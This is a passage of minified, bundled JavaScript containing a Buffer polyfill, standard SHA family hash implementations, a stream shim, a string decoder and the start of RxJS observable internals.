Q=ae.Buffer={};for(I in $)!$.hasOwnProperty(I)||"allocUnsafe"===I||"allocUnsafeSlow"===I||(Q[I]=$[I]);if(ae.Buffer.prototype=$.prototype,(!Q.from||Q.from===Uint8Array.from)&&(Q.from=function(F,E,g){if("number"==typeof F)throw new TypeError('The "value" argument must not be of type number. Received type '+typeof F);if(F&&void 0===F.length)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof F);return $(F,E,g)}),Q.alloc||(Q.alloc=function(F,E,g){if("number"!=typeof F)throw new TypeError('The "size" argument must be of type number. Received type '+typeof F);if(F<0||F>=2*(1<<30))throw new RangeError('The value "'+F+'" is invalid for option "size"');var b=$(F);return E&&0!==E.length?"string"==typeof g?b.fill(E,g):b.fill(E):b.fill(0),b}),!ae.kStringMaxLength)try{ae.kStringMaxLength=ie.binding("buffer").kStringMaxLength}catch(F){}ae.constants||(ae.constants={MAX_LENGTH:ae.kMaxLength},ae.kStringMaxLength&&(ae.constants.MAX_STRING_LENGTH=ae.kStringMaxLength)),Pe.exports=ae},7500:(Pe,we,de)=>{var ie=de(265).Buffer;function j($,ae){this._block=ie.alloc($),this._finalSize=ae,this._blockSize=$,this._len=0}j.prototype.update=function($,ae){"string"==typeof $&&($=ie.from($,ae=ae||"utf8"));for(var I=this._block,Q=this._blockSize,F=$.length,E=this._len,g=0;g<F;){for(var b=E%Q,_=Math.min(F-g,Q-b),y=0;y<_;y++)I[b+y]=$[g+y];g+=_,(E+=_)%Q==0&&this._update(I)}return this._len+=F,this},j.prototype.digest=function($){var ae=this._len%this._blockSize;this._block[ae]=128,this._block.fill(0,ae+1),ae>=this._finalSize&&(this._update(this._block),this._block.fill(0));var I=8*this._len;if(I<=4294967295)this._block.writeUInt32BE(I,this._blockSize-4);else{var Q=(4294967295&I)>>>0;this._block.writeUInt32BE((I-Q)/4294967296,this._blockSize-8),this._block.writeUInt32BE(Q,this._blockSize-4)}this._update(this._block);var E=this._hash();return $?E.toString($):E},j.prototype._update=function(){throw new Error("_update must be implemented by subclass")},Pe.exports=j},6890:(Pe,we,de)=>{var ie=Pe.exports=function($){$=$.toLowerCase();var ae=ie[$];if(!ae)throw new Error($+" is not supported (we accept pull requests)");return new ae};ie.sha=de(3142),ie.sha1=de(2385),ie.sha224=de(3974),ie.sha256=de(5757),ie.sha384=de(9241),ie.sha512=de(3190)},3142:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(b){return b<<5|b>>>27}function E(b){return b<<30|b>>>2}function g(b,_,y,M){return 0===b?_&y|~_&M:2===b?_&y|_&M|y&M:_^y^M}ie(Q,j),Q.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},Q.prototype._update=function(b){for(var _=this._w,y=0|this._a,M=0|this._b,p=0|this._c,D=0|this._d,w=0|this._e,x=0;x<16;++x)_[x]=b.readInt32BE(4*x);for(;x<80;++x)_[x]=_[x-3]^_[x-8]^_[x-14]^_[x-16];for(var S=0;S<80;++S){var O=~~(S/20),U=F(y)+g(O,M,p,D)+w+_[S]+ae[O]|0;w=D,D=p,p=E(M),M=y,y=U}this._a=y+this._a|0,this._b=M+this._b|0,this._c=p+this._c|0,this._d=D+this._d|0,this._e=w+this._e|0},Q.prototype._hash=function(){var b=$.allocUnsafe(20);return b.writeInt32BE(0|this._a,0),b.writeInt32BE(0|this._b,4),b.writeInt32BE(0|this._c,8),b.writeInt32BE(0|this._d,12),b.writeInt32BE(0|this._e,16),b},Pe.exports=Q},2385:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1518500249,1859775393,-1894007588,-899497514],I=new Array(80);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(_){return _<<1|_>>>31}function E(_){return _<<5|_>>>27}function g(_){return _<<30|_>>>2}function b(_,y,M,p){return 0===_?y&M|~y&p:2===_?y&M|y&p|M&p:y^M^p}ie(Q,j),Q.prototype.init=function(){return this._a=1732584193,this._b=4023233417,this._c=2562383102,this._d=271733878,this._e=3285377520,this},Q.prototype._update=function(_){for(var y=this._w,M=0|this._a,p=0|this._b,D=0|this._c,w=0|this._d,x=0|this._e,S=0;S<16;++S)y[S]=_.readInt32BE(4*S);for(;S<80;++S)y[S]=F(y[S-3]^y[S-8]^y[S-14]^y[S-16]);for(var O=0;O<80;++O){var U=~~(O/20),K=E(M)+b(U,p,D,w)+x+y[O]+ae[U]|0;x=w,w=D,D=g(p),p=M,M=K}this._a=M+this._a|0,this._b=p+this._b|0,this._c=D+this._c|0,this._d=w+this._d|0,this._e=x+this._e|0},Q.prototype._hash=function(){var _=$.allocUnsafe(20);return _.writeInt32BE(0|this._a,0),_.writeInt32BE(0|this._b,4),_.writeInt32BE(0|this._c,8),_.writeInt32BE(0|this._d,12),_.writeInt32BE(0|this._e,16),_},Pe.exports=Q},3974:(Pe,we,de)=>{var ie=de(2270),j=de(5757),$=de(7500),ae=de(265).Buffer,I=new Array(64);function Q(){this.init(),this._w=I,$.call(this,64,56)}ie(Q,j),Q.prototype.init=function(){return this._a=3238371032,this._b=914150663,this._c=812702999,this._d=4144912697,this._e=4290775857,this._f=1750603025,this._g=1694076839,this._h=3204075428,this},Q.prototype._hash=function(){var F=ae.allocUnsafe(28);return F.writeInt32BE(this._a,0),F.writeInt32BE(this._b,4),F.writeInt32BE(this._c,8),F.writeInt32BE(this._d,12),F.writeInt32BE(this._e,16),F.writeInt32BE(this._f,20),F.writeInt32BE(this._g,24),F},Pe.exports=Q},5757:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298],I=new Array(64);function Q(){this.init(),this._w=I,j.call(this,64,56)}function F(M,p,D){return D^M&(p^D)}function E(M,p,D){return M&p|D&(M|p)}function g(M){return(M>>>2|M<<30)^(M>>>13|M<<19)^(M>>>22|M<<10)}function b(M){return(M>>>6|M<<26)^(M>>>11|M<<21)^(M>>>25|M<<7)}function _(M){return(M>>>7|M<<25)^(M>>>18|M<<14)^M>>>3}function y(M){return(M>>>17|M<<15)^(M>>>19|M<<13)^M>>>10}ie(Q,j),Q.prototype.init=function(){return this._a=1779033703,this._b=3144134277,this._c=1013904242,this._d=2773480762,this._e=1359893119,this._f=2600822924,this._g=528734635,this._h=1541459225,this},Q.prototype._update=function(M){for(var p=this._w,D=0|this._a,w=0|this._b,x=0|this._c,S=0|this._d,O=0|this._e,U=0|this._f,K=0|this._g,ee=0|this._h,se=0;se<16;++se)p[se]=M.readInt32BE(4*se);for(;se<64;++se)p[se]=y(p[se-2])+p[se-7]+_(p[se-15])+p[se-16]|0;for(var ve=0;ve<64;++ve){var le=ee+b(O)+F(O,U,K)+ae[ve]+p[ve]|0,ye=g(D)+E(D,w,x)|0;ee=K,K=U,U=O,O=S+le|0,S=x,x=w,w=D,D=le+ye|0}this._a=D+this._a|0,this._b=w+this._b|0,this._c=x+this._c|0,this._d=S+this._d|0,this._e=O+this._e|0,this._f=U+this._f|0,this._g=K+this._g|0,this._h=ee+this._h|0},Q.prototype._hash=function(){var M=$.allocUnsafe(32);return M.writeInt32BE(this._a,0),M.writeInt32BE(this._b,4),M.writeInt32BE(this._c,8),M.writeInt32BE(this._d,12),M.writeInt32BE(this._e,16),M.writeInt32BE(this._f,20),M.writeInt32BE(this._g,24),M.writeInt32BE(this._h,28),M},Pe.exports=Q},9241:(Pe,we,de)=>{var ie=de(2270),j=de(3190),$=de(7500),ae=de(265).Buffer,I=new Array(160);function Q(){this.init(),this._w=I,$.call(this,128,112)}ie(Q,j),Q.prototype.init=function(){return this._ah=3418070365,this._bh=1654270250,this._ch=2438529370,this._dh=355462360,this._eh=1731405415,this._fh=2394180231,this._gh=3675008525,this._hh=1203062813,this._al=3238371032,this._bl=914150663,this._cl=812702999,this._dl=4144912697,this._el=4290775857,this._fl=1750603025,this._gl=1694076839,this._hl=3204075428,this},Q.prototype._hash=function(){var F=ae.allocUnsafe(48);function E(g,b,_){F.writeInt32BE(g,_),F.writeInt32BE(b,_+4)}return E(this._ah,this._al,0),E(this._bh,this._bl,8),E(this._ch,this._cl,16),E(this._dh,this._dl,24),E(this._eh,this._el,32),E(this._fh,this._fl,40),F},Pe.exports=Q},3190:(Pe,we,de)=>{var ie=de(2270),j=de(7500),$=de(265).Buffer,ae=[1116352408,3609767458,1899447441,602891725,3049323471,3964484399,3921009573,2173295548,961987163,4081628472,1508970993,3053834265,2453635748,2937671579,2870763221,3664609560,3624381080,2734883394,310598401,1164996542,607225278,1323610764,1426881987,3590304994,1925078388,4068182383,2162078206,991336113,2614888103,633803317,3248222580,3479774868,3835390401,2666613458,4022224774,944711139,264347078,2341262773,604807628,2007800933,770255983,1495990901,1249150122,1856431235,1555081692,3175218132,1996064986,2198950837,2554220882,3999719339,2821834349,766784016,2952996808,2566594879,3210313671,3203337956,3336571891,1034457026,3584528711,2466948901,113926993,3758326383,338241895,168717936,666307205,1188179964,773529912,1546045734,1294757372,1522805485,1396182291,2643833823,1695183700,2343527390,1986661051,1014477480,2177026350,1206759142,2456956037,344077627,2730485921,1290863460,2820302411,3158454273,3259730800,3505952657,3345764771,106217008,3516065817,3606008344,3600352804,1432725776,4094571909,1467031594,275423344,851169720,430227734,3100823752,506948616,1363258195,659060556,3750685593,883997877,3785050280,958139571,3318307427,1322822218,3812723403,1537002063,2003034995,1747873779,3602036899,1955562222,1575990012,2024104815,1125592928,2227730452,2716904306,2361852424,442776044,2428436474,593698344,2756734187,3733110249,3204031479,2999351573,3329325298,3815920427,3391569614,3928383900,3515267271,566280711,3940187606,3454069534,4118630271,4000239992,116418474,1914138554,174292421,2731055270,289380356,3203993006,460393269,320620315,685471733,587496836,852142971,1086792851,1017036298,365543100,1126000580,2618297676,1288033470,3409855158,1501505948,4234509866,1607167915,987167468,1816402316,1246189591],I=new Array(160);function Q(){this.init(),this._w=I,j.call(this,128,112)}function F(w,x,S){return S^w&(x^S)}function E(w,x,S){return w&x|S&(w|x)}function g(w,x){return(w>>>28|x<<4)^(x>>>2|w<<30)^(x>>>7|w<<25)}function b(w,x){return(w>>>14|x<<18)^(w>>>18|x<<14)^(x>>>9|w<<23)}function _(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^w>>>7}function y(w,x){return(w>>>1|x<<31)^(w>>>8|x<<24)^(w>>>7|x<<25)}function M(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^w>>>6}function p(w,x){return(w>>>19|x<<13)^(x>>>29|w<<3)^(w>>>6|x<<26)}function D(w,x){return w>>>0<x>>>0?1:0}ie(Q,j),Q.prototype.init=function(){return this._ah=1779033703,this._bh=3144134277,this._ch=1013904242,this._dh=2773480762,this._eh=1359893119,this._fh=2600822924,this._gh=528734635,this._hh=1541459225,this._al=4089235720,this._bl=2227873595,this._cl=4271175723,this._dl=1595750129,this._el=2917565137,this._fl=725511199,this._gl=4215389547,this._hl=327033209,this},Q.prototype._update=function(w){for(var x=this._w,S=0|this._ah,O=0|this._bh,U=0|this._ch,K=0|this._dh,ee=0|this._eh,se=0|this._fh,ve=0|this._gh,le=0|this._hh,ye=0|this._al,z=0|this._bl,l=0|this._cl,f=0|this._dl,A=0|this._el,v=0|this._fl,P=0|this._gl,G=0|this._hl,X=0;X<32;X+=2)x[X]=w.readInt32BE(4*X),x[X+1]=w.readInt32BE(4*X+4);for(;X<160;X+=2){var L=x[X-30],h=x[X-30+1],R=_(L,h),J=y(h,L),Z=M(L=x[X-4],h=x[X-4+1]),ue=p(h,L),Ue=x[X-32],Xe=x[X-32+1],He=J+x[X-14+1]|0,Be=R+x[X-14]+D(He,J)|0;Be=(Be=Be+Z+D(He=He+ue|0,ue)|0)+Ue+D(He=He+Xe|0,Xe)|0,x[X]=Be,x[X+1]=He}for(var qe=0;qe<160;qe+=2){Be=x[qe],He=x[qe+1];var De=E(S,O,U),Ve=E(ye,z,l),ze=g(S,ye),me=g(ye,S),Ke=b(ee,A),rt=b(A,ee),Ge=ae[qe],Qe=ae[qe+1],ht=F(ee,se,ve),mt=F(A,v,P),lt=G+rt|0,ft=le+Ke+D(lt,G)|0;ft=(ft=(ft=ft+ht+D(lt=lt+mt|0,mt)|0)+Ge+D(lt=lt+Qe|0,Qe)|0)+Be+D(lt=lt+He|0,He)|0;var xe=me+Ve|0,We=ze+De+D(xe,me)|0;le=ve,G=P,ve=se,P=v,se=ee,v=A,ee=K+ft+D(A=f+lt|0,f)|0,K=U,f=l,U=O,l=z,O=S,z=ye,S=ft+We+D(ye=lt+xe|0,lt)|0}this._al=this._al+ye|0,this._bl=this._bl+z|0,this._cl=this._cl+l|0,this._dl=this._dl+f|0,this._el=this._el+A|0,this._fl=this._fl+v|0,this._gl=this._gl+P|0,this._hl=this._hl+G|0,this._ah=this._ah+S+D(this._al,ye)|0,this._bh=this._bh+O+D(this._bl,z)|0,this._ch=this._ch+U+D(this._cl,l)|0,this._dh=this._dh+K+D(this._dl,f)|0,this._eh=this._eh+ee+D(this._el,A)|0,this._fh=this._fh+se+D(this._fl,v)|0,this._gh=this._gh+ve+D(this._gl,P)|0,this._hh=this._hh+le+D(this._hl,G)|0},Q.prototype._hash=function(){var w=$.allocUnsafe(64);function x(S,O,U){w.writeInt32BE(S,U),w.writeInt32BE(O,U+4)}return x(this._ah,this._al,0),x(this._bh,this._bl,8),x(this._ch,this._cl,16),x(this._dh,this._dl,24),x(this._eh,this._el,32),x(this._fh,this._fl,40),x(this._gh,this._gl,48),x(this._hh,this._hl,56),w},Pe.exports=Q},7856:(Pe,we,de)=>{"use strict";var ie=de(5449).Buffer;const j=Symbol.prototype.valueOf,$=de(7374);Pe.exports=function ae(b,_){switch($(b)){case"array":return b.slice();case"object":return Object.assign({},b);case"date":return new b.constructor(Number(b));case"map":return new Map(b);case"set":return new Set(b);case"buffer":return function E(b){const _=b.length,y=ie.allocUnsafe?ie.allocUnsafe(_):ie.from(_);return b.copy(y),y}(b);case"symbol":return function g(b){return j?Object(j.call(b)):{}}(b);case"arraybuffer":return function Q(b){const _=new b.constructor(b.byteLength);return new Uint8Array(_).set(new Uint8Array(b)),_}(b);case"float32array":case"float64array":case"int16array":case"int32array":case"int8array":case"uint16array":case"uint32array":case"uint8clampedarray":case"uint8array":return function F(b,_){return new b.constructor(b.buffer,b.byteOffset,b.length)}(b);case"regexp":return function I(b){const _=void 0!==b.flags?b.flags:/\w+$/.exec(b)||void 0,y=new b.constructor(b.source,_);return y.lastIndex=b.lastIndex,y}(b);case"error":return Object.create(b);default:return b}}},4893:(Pe,we,de)=>{Pe.exports=$;var ie=de(8227).EventEmitter;function $(){ie.call(this)}de(2270)($,ie),$.Readable=de(5455),$.Writable=de(2481),$.Duplex=de(5157),$.Transform=de(3148),$.PassThrough=de(8743),$.finished=de(1341),$.pipeline=de(6157),$.Stream=$,$.prototype.pipe=function(ae,I){var Q=this;function F(p){ae.writable&&!1===ae.write(p)&&Q.pause&&Q.pause()}function E(){Q.readable&&Q.resume&&Q.resume()}Q.on("data",F),ae.on("drain",E),!ae._isStdio&&(!I||!1!==I.end)&&(Q.on("end",b),Q.on("close",_));var g=!1;function b(){g||(g=!0,ae.end())}function _(){g||(g=!0,"function"==typeof ae.destroy&&ae.destroy())}function y(p){if(M(),0===ie.listenerCount(this,"error"))throw p}function M(){Q.removeListener("data",F),ae.removeListener("drain",E),Q.removeListener("end",b),Q.removeListener("close",_),Q.removeListener("error",y),ae.removeListener("error",y),Q.removeListener("end",M),Q.removeListener("close",M),ae.removeListener("close",M)}return Q.on("error",y),ae.on("error",y),Q.on("end",M),Q.on("close",M),ae.on("close",M),ae.emit("pipe",Q),ae}},5741:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=ie.isEncoding||function(S){switch((S=""+S)&&S.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function I(S){var O;switch(this.encoding=function ae(S){var O=function $(S){if(!S)return"utf8";for(var O;;)switch(S){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return S;default:if(O)return;S=(""+S).toLowerCase(),O=!0}}(S);if("string"!=typeof O&&(ie.isEncoding===j||!j(S)))throw new Error("Unknown encoding: "+S);return O||S}(S),this.encoding){case"utf16le":this.text=y,this.end=M,O=4;break;case"utf8":this.fillLast=g,O=4;break;case"base64":this.text=p,this.end=D,O=3;break;default:return this.write=w,void(this.end=x)}this.lastNeed=0,this.lastTotal=0,this.lastChar=ie.allocUnsafe(O)}function Q(S){return S<=127?0:S>>5==6?2:S>>4==14?3:S>>3==30?4:S>>6==2?-1:-2}function g(S){var O=this.lastTotal-this.lastNeed,U=function E(S,O,U){if(128!=(192&O[0]))return S.lastNeed=0,"\ufffd";if(S.lastNeed>1&&O.length>1){if(128!=(192&O[1]))return S.lastNeed=1,"\ufffd";if(S.lastNeed>2&&O.length>2&&128!=(192&O[2]))return S.lastNeed=2,"\ufffd"}}(this,S);return void 0!==U?U:this.lastNeed<=S.length?(S.copy(this.lastChar,O,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(S.copy(this.lastChar,O,0,S.length),void(this.lastNeed-=S.length))}function y(S,O){if((S.length-O)%2==0){var U=S.toString("utf16le",O);if(U){var K=U.charCodeAt(U.length-1);if(K>=55296&&K<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1],U.slice(0,-1)}return U}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=S[S.length-1],S.toString("utf16le",O,S.length-1)}function M(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):O}function p(S,O){var U=(S.length-O)%3;return 0===U?S.toString("base64",O):(this.lastNeed=3-U,this.lastTotal=3,1===U?this.lastChar[0]=S[S.length-1]:(this.lastChar[0]=S[S.length-2],this.lastChar[1]=S[S.length-1]),S.toString("base64",O,S.length-U))}function D(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+this.lastChar.toString("base64",0,3-this.lastNeed):O}function w(S){return S.toString(this.encoding)}function x(S){return S&&S.length?this.write(S):""}we.s=I,I.prototype.write=function(S){if(0===S.length)return"";var O,U;if(this.lastNeed){if(void 0===(O=this.fillLast(S)))return"";U=this.lastNeed,this.lastNeed=0}else U=0;return U<S.length?O?O+this.text(S,U):this.text(S,U):O||""},I.prototype.end=function _(S){var O=S&&S.length?this.write(S):"";return this.lastNeed?O+"\ufffd":O},I.prototype.text=function b(S,O){var U=function F(S,O,U){var K=O.length-1;if(K<U)return 0;var ee=Q(O[K]);return ee>=0?(ee>0&&(S.lastNeed=ee-1),ee):--K<U||-2===ee?0:(ee=Q(O[K]))>=0?(ee>0&&(S.lastNeed=ee-2),ee):--K<U||-2===ee?0:(ee=Q(O[K]))>=0?(ee>0&&(2===ee?ee=0:S.lastNeed=ee-3),ee):0}(this,S,O);if(!this.lastNeed)return S.toString("utf8",O);this.lastTotal=U;var K=S.length-(U-this.lastNeed);return S.copy(this.lastChar,0,K),S.toString("utf8",O,K)},I.prototype.fillLast=function(S){if(this.lastNeed<=S.length)return S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);S.copy(this.lastChar,this.lastTotal-this.lastNeed,0,S.length),this.lastNeed-=S.length}},7226:Pe=>{function de(ie){try{if(!global.localStorage)return!1}catch($){return!1}var j=global.localStorage[ie];return null!=j&&"true"===String(j).toLowerCase()}Pe.exports=function we(ie,j){if(de("noDeprecation"))return ie;var $=!1;return function ae(){if(!$){if(de("throwDeprecation"))throw new Error(j);de("traceDeprecation")?console.trace(j):console.warn(j),$=!0}return ie.apply(this,arguments)}}},6854:Pe=>{Pe.exports=function we(de,ie){if(de&&ie)return we(de)(ie);if("function"!=typeof de)throw new TypeError("need wrapper function");return Object.keys(de).forEach(function($){j[$]=de[$]}),j;function j(){for(var $=new Array(arguments.length),ae=0;ae<$.length;ae++)$[ae]=arguments[ae];var I=de.apply(this,$),Q=$[$.length-1];return"function"==typeof I&&I!==Q&&Object.keys(Q).forEach(function(F){I[F]=Q[F]}),I}}},1613:(Pe,we,de)=>{"use strict";function ie(t){return"function"==typeof t}function j(t){const e=t(i=>{Error.call(i),i.stack=(new Error).stack});return e.prototype=Object.create(Error.prototype),e.prototype.constructor=e,e}const $=j(t=>function(e){t(this),this.message=e?`${e.length} errors occurred during unsubscription:\n${e.map((i,n)=>`${n+1}) ${i.toString()}`).join("\n  ")}`:"",this.name="UnsubscriptionError",this.errors=e});function ae(t,a){if(t){const e=t.indexOf(a);0<=e&&t.splice(e,1)}}class I{constructor(a){this.initialTeardown=a,this.closed=!1,this._parentage=null,this._finalizers=null}unsubscribe(){let a;if(!this.closed){this.closed=!0;const{_parentage:e}=this;if(e)if(this._parentage=null,Array.isArray(e))for(const r of e)r.remove(this);else e.remove(this);const{initialTeardown:i}=this;if(ie(i))try{i()}catch(r){a=r instanceof $?r.errors:[r]}const{_finalizers:n}=this;if(n){this._finalizers=null;for(const r of n)try{E(r)}catch(c){a=null!=a?a:[],c instanceof $?a=[...a,...c.errors]:a.push(c)}}if(a)throw new $(a)}}add(a){var e;if(a&&a!==this)if(this.closed)E(a);else{if(a instanceof I){if(a.closed||a._hasParent(this))return;a._addParent(this)}(this._finalizers=null!==(e=this._finalizers)&&void 0!==e?e:[]).push(a)}}_hasParent(a){const{_parentage:e}=this;return e===a||Array.isArray(e)&&e.includes(a)}_addParent(a){const{_parentage:e}=this;this._parentage=Array.isArray(e)?(e.push(a),e):e?[e,a]:a}_removeParent(a){const{_parentage:e}=this;e===a?this._parentage=null:Array.isArray(e)&&ae(e,a)}remove(a){const{_finalizers:e}=this;e&&ae(e,a),a instanceof I&&a._removeParent(this)}}I.EMPTY=(()=>{const t=new I;return t.closed=!0,t})();const Q=I.EMPTY;function F(t){return t instanceof I||t&&"closed"in t&&ie(t.remove)&&ie(t.add)&&ie(t.unsubscribe)}function E(t){ie(t)?t():t.unsubscribe()}const g={onUnhandledError:null,onStoppedNotification:null,Promise:void 0,useDeprecatedSynchronousErrorHandling:!1,useDeprecatedNextContext:!1},b={setTimeout(t,a,...e){const{delegate:i}=b;return null!=i&&i.setTimeout?i.setTimeout(t,a,...e):setTimeout(t,a,...e)},clearTimeout(t){const{delegate:a}=b;return((null==a?void 0:a.clearTimeout)||clearTimeout)(t)},delegate:void 0};function _(t){b.setTimeout(()=>{const{onUnhandledError:a}=g;if(!a)throw t;a(t)})}function y(){}const M=w("C",void 0,void 0);function w(t,a,e){return{kind:t,value:a,error:e}}let x=null;function S(t){if(g.useDeprecatedSynchronousErrorHandling){const a=!x;if(a&&(x={errorThrown:!1,error:null}),t(),a){const{errorThrown:e,error:i}=x;if(x=null,e)throw i}}else t()}class U extends I{constructor(a){super(),this.isStopped=!1,a?(this.destination=a,F(a)&&a.add(this)):this.destination=l}static create(a,e,i){return new ve(a,e,i)}next(a){this.isStopped?z(function D(t){return w("N",t,void 0)}(a),this):this._next(a)}error(a){this.isStopped?z(function p(t){return w("E",void 0,t)}(a),this):(this.isStopped=!0,this._error(a))}complete(){this.isStopped?z(M,this):(this.isStopped=!0,this._complete())}unsubscribe(){this.closed||(this.isStopped=!0,super.unsubscribe(),this.destination=null)}_next(a){this.destination.next(a)}_error(a){try{this.destination.error(a)}finally{this.unsubscribe()}}_complete(){try{this.destination.complete()}finally{this.unsubscribe()}}}const K=Function.prototype.bind;function ee(t,a){return K.call(t,a)}class se{constructor(a){this.partialObserver=a}next(a){const{partialObserver:e}=this;if(e.next)try{e.next(a)}catch(i){le(i)}}error(a){const{partialObserver:e}=this;if(e.error)try{e.error(a)}catch(i){le(i)}else le(a)}complete(){const{partialObserver:a}=this;if(a.complete)try{a.complete()}catch(e){le(e)}}}class ve extends U{constructor(a,e,i){let n;if(super(),ie(a)||!a)n={next:null!=a?a:void 0,error:null!=e?e:void 0,complete:null!=i?i:void 0};else{let r;this&&g.useDeprecatedNextContext?(r=Object.create(a),r.unsubscribe=()=>this.unsubscribe(),n={next:a.next&&ee(a.next,r),error:a.error&&ee(a.error,r),complete:a.complete&&ee(a.complete,r)}):n=a}this.destination=new se(n)}}function le(t){g.useDeprecatedSynchronousErrorHandling?function O(t){g.useDeprecatedSynchronousErrorHandling&&x&&(x.errorThrown=!0,x.error=t)}(t):_(t)}function z(t,a){const{onStoppedNotification:e}=g;e&&b.setTimeout(()=>e(t,a))}const l={closed:!0,next:y,error:function ye(t){throw t},complete:y},f="function"==typeof Symbol&&Symbol.observable||"@@observable";function A(t){return t}function P(t){return 0===t.length?A:1===t.length?t[0]:function(e){return t.reduce((i,n)=>n(i),e)}}let G=(()=>{class t{constructor(e){e&&(this._subscribe=e)}lift(e){const i=new t;return i.source=this,i.operator=e,i}subscribe(e,i,n){const r=function h(t){return t&&t instanceof U||function L(t){return t&&ie(t.next)&&ie(t.error)&&ie(t.complete)}(t)&&F(t)}(e)?e:new ve(e,i,n);return S(()=>{const{operator:c,source:d}=this;r.add(c?c.call(r,d):d?this._subscribe(r):this._trySubscribe(r))}),r}_trySubscribe(e){try{return this._subscribe(e)}catch(i){e.error(i)}}forEach(e,i){return new(i=X(i))((n,r)=>{const c=new ve({next:d=>{try{e(d)}catch(T){r(T),c.unsubscribe()}},error:r,complete:n});this.subscribe(c)})}_subscribe(e){var i;return null===(i=this.source)||void 0===i?void 0:i.subscribe(e)}[f](){return this}pipe(...e){return P(e)(this)}toPromise(e){return new(e=X(e))((i,n)=>{let r;this.subscribe(c=>r=c,c=>n(c),()=>i(r))})}}return t.create=a=>new t(a),t})();function X(t){var a;return null!==(a=null!=t?t:g.Promise)&&void 0!==a?a:Promise}const R=j(t=>function(){t(this),this.name="ObjectUnsubscribedError",this.message="object unsubscribed"});let J=(()=>{class t extends G{constructor(){super(),this.closed=!1,this.currentObservers=null,this.observers=[],this.isStopped=!1,this.hasError=!1,this.thrownError=null}lift(e){const i=new Z(this,this);return i.operator=e,i}_throwIfClosed(){if(this.closed)throw new R}next(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.currentObservers||(this.currentObservers=Array.from(this.observers));for(const i of this.currentObservers)i.next(e)}})}error(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.hasError=this.isStopped=!0,this.thrownError=e;const{observers:i}=this;for(;i.length;)i.shift().error(e)}})}complete(){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.isStopped=!0;const{observers:e}=this;for(;e.length;)e.shift().complete()}})}unsubscribe(){this.isStopped=this.closed=!0,this.observers=this.currentObservers=null}get observed(){var e;return(null===(e=this.observers)||void 0===e?void 0:e.length)>0}_trySubscribe(e){return this._throwIfClosed(),super._trySubscribe(e)}_subscribe(e){return this._throwIfClosed(),this._checkFinalizedStatuses(e),this._innerSubscribe(e)}_innerSubscribe(e){const{hasError:i,isStopped:n,observers:r}=this;return i||n?Q:(this.currentObservers=null,r.push(e),new I(()=>{this.currentObservers=null,ae(r,e)}))}_checkFinalizedStatuses(e){const{hasError:i,thrownError:n,isStopped:r}=this;i?e.error(n):r&&e.complete()}asObservable(){const e=new G;return e.source=this,e}}return t.create=(a,e)=>new Z(a,e),t})();class Z extends J{constructor(a,e){super(),this.destination=a,this.source=e}next(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.next)||void 0===i||i.call(e,a)}error(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.error)||void 0===i||i.call(e,a)}complete(){var a,e;null===(e=null===(a=this.destination)||void 0===a?void 0:a.complete)||void 0===e||e.call(a)}_subscribe(a){var e,i;return null!==(i=null===(e=this.source)||void 0===e?void 0:e.subscribe(a))&&void 0!==i?i:Q}}function ue(t){return ie(null==t?void 0:t.lift)}function Ie(t){return a=>{if(ue(a))return a.lift(function(e){try{return t(e,this)}catch(i){this.error(i)}});throw new TypeError("Unable to lift unknown Observable type")}}function Ae(t,a,e,i,n){return new Ue(t,a,e,i,n)}class Ue extends U{constructor(a,e,i,n,r,c){super(a),this.onFinalize=r,this.shouldUnsubscribe=c,this._next=e?function(d){try{e(d)}catch(T){a.error(T)}}:super._next,this._error=n?function(d){try{n(d)}catch(T){a.error(T)}finally{this.unsubscribe()}}:super._error,this._complete=i?function(){try{i()}catch(d){a.error(d)}finally{this.unsubscribe()}}:super._complete}unsubscribe(){var a;if(!this.shouldUnsubscribe||this.shouldUnsubscribe()){const{closed:e}=this;super.unsubscribe(),!e&&(null===(a=this.onFinalize)||void 0===a||a.call(this))}}}function Xe(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{i.next(t.call(a,r,n++))}))})}function ht(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function 